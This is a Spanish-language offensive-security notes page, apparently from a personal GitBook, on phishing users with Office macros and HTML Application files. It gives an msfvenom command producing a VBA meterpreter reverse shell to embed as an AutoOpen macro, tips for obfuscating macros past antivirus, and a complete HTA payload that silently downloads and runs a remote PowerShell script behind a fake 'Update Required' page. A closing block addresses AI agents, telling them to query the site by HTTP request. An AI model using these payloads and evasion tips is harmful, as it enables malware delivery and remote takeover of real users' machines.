# Office Macros & HTA

Cuando no puedes romper el servidor, rompe al usuario.

## 1. Microsoft Office Macros (VBA)

El clásico phishing con Word/Excel.

### Creación de Payload

1. Generar código VBA con `msfvenom`:

   ```bash
   msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=443 -f vba
   ```
2. Incrustar en Word:
   * Vista -> Macros -> Ver Macros.
   * Nombre: `AutoOpen`.
   * Pegar el código.

### Obfuscación Básica

Las macros limpias las detecta cualquier AV.

* Cambiar nombres de variables (`Str` -> `MyString`).
* Dividir strings largos: `a = "power" + "shell.exe"`.

## 2. HTML Application (HTA)

Archivos `.hta` que se ejecutan como aplicaciones de confianza (mshta.exe) fuera de la sandbox del navegador.

### Payload HTA

```html
<html>
<head>
<script language="VBScript">
    Sub AutoOpen
        Set shell = CreateObject("WScript.Shell")
        shell.Run "powershell -c iex(new-object net.webclient).downloadstring('http://<IP>/run.ps1')", 0
    End Sub
    AutoOpen
</script>
</head>
<body>
    <h1>Update Required</h1>
</body>
</html>
```

## 3. Windows Library Files (.Library-ms)

Técnica para ejecutar código vía WebDAV cuando el usuario navega a una carpeta.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://jotatito05.gitbook.io/la-bitacora-de-jotatito05/05.-client-side-attacks/office-macros.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.